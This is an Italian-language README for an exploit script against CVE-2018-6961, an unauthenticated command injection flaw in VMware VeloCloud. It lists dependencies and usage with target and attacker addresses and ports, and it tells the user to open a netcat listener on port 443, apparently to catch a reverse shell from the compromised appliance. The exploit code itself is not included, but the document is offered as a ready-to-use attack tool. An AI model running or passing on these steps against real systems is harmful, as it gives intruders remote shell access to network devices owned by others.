
veloCloud VMWare - Vulnerabilità
CVE-2018-6961 - VULNERABILITÀ DI INIEZIONE DI COMANDI NON AUTENTICATA
Questo exploit funziona con Python2.7 - Non testato in altre versioni
1) Installa le dipendenze
pip install request
se non hai pip installato, esegui semplicemente
apt-get install python-pip
**2) Utilizzo **
python exployt.py --rhost --interface --lhost --lport --function
python exploit.py --rhost 1.1.1.1 --interface ge1 --lhost 2.2.2.2 --lport 443 --function traceroute
Exploiting...................
3) Non dimenticare di impostare netcat su un altro terminale
nc -vlnp 443
TODO --migliora lo script per eseguire netcat sullo stesso terminale